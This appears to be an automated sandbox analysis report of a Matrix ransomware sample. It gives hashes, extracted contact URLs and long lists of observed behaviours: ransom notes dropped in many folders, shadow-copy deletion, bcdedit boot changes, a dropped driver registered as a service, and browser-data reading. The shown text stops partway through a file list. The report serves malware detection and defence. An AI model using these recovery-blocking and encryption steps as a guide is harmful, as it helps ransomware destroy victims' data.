Analysis
-
max time kernel
300s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
01-09-2023 05:14
Static task
static1
Behavioral task
behavioral1
Sample
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
Resource
win10v2004-20230831-en
General
-
Target
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
-
Size
3.8MB
-
MD5
ac42a9b2338847bb398152b1bf6401fd
-
SHA1
02daf9ff6773da4d134c94fdb7630af2cc01e399
-
SHA256
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
-
SHA512
016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
-
SSDEEP
49152:PXlOslYQt+5oXlabPyyNHb/GMO6d+5M+HKo:PEUYQtXQFC6s5M+HH
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exedescription ioc process File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\Minesweeper\it-IT\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Public\Libraries\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Public\Documents\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\Solitaire\de-DE\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\FreeCell\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Mozilla Firefox\browser\features\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y91isig8.Admin\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Default\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Public\Music\Sample Music\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\Purble Place\de-DE\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Mozilla Firefox\uninstall\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Mozilla Firefox\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\Mahjong\de-DE\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Microsoft Games\FreeCell\de-DE\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3660 bcdedit.exe 3772 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1932 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
IOtPzdjO64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS IOtPzdjO64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
IOtPzdjO64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" IOtPzdjO64.exe -
Executes dropped EXE 3 IoCs
Processes:
NW0K8i8z.exeIOtPzdjO.exeIOtPzdjO64.exepid process 3068 NW0K8i8z.exe 1360 IOtPzdjO.exe 772 IOtPzdjO64.exe -
Loads dropped DLL 4 IoCs
Processes:
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.execmd.exeIOtPzdjO.exepid process 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 2480 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 1044 cmd.exe 1360 IOtPzdjO.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\IOtPzdjO.exe upx behavioral1/memory/1044-1944-0x0000000000400000-0x0000000000477000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\IOtPzdjO.exe upx C:\Users\Admin\AppData\Local\Temp\IOtPzdjO.exe upx behavioral1/memory/1360-9351-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
Processes:
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exedescription ioc process File opened for modification C:\Program Files\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Videos\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Music\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\D6U5T852\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7HDNK2PI\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\SWQN37B6\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BJFN2KPS\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Links\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Music\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Documents\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exeIOtPzdjO64.exedescription ioc process File opened (read-only) \??\U: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\P: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\O: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\T: IOtPzdjO64.exe File opened (read-only) \??\L: IOtPzdjO64.exe File opened (read-only) \??\Y: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\X: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\V: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\Q: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\J: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\B: IOtPzdjO64.exe File opened (read-only) \??\K: IOtPzdjO64.exe File opened (read-only) \??\W: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\R: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\M: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\E: IOtPzdjO64.exe File opened (read-only) \??\S: IOtPzdjO64.exe File opened (read-only) \??\K: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\G: IOtPzdjO64.exe File opened (read-only) \??\H: IOtPzdjO64.exe File opened (read-only) \??\I: IOtPzdjO64.exe File opened (read-only) \??\J: IOtPzdjO64.exe File opened (read-only) \??\Q: IOtPzdjO64.exe File opened (read-only) \??\V: IOtPzdjO64.exe File opened (read-only) \??\I: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\H: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\O: IOtPzdjO64.exe File opened (read-only) \??\T: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\S: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\N: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\E: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\A: IOtPzdjO64.exe File opened (read-only) \??\P: IOtPzdjO64.exe File opened (read-only) \??\Y: IOtPzdjO64.exe File opened (read-only) \??\Z: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\U: IOtPzdjO64.exe File opened (read-only) \??\Z: IOtPzdjO64.exe File opened (read-only) \??\L: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\G: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\M: IOtPzdjO64.exe File opened (read-only) \??\N: IOtPzdjO64.exe File opened (read-only) \??\R: IOtPzdjO64.exe File opened (read-only) \??\W: IOtPzdjO64.exe File opened (read-only) \??\X: IOtPzdjO64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IJgd5MGr.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\liboggspots_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msolap100.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Mozilla Firefox\mozglue.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i422_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_it.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp 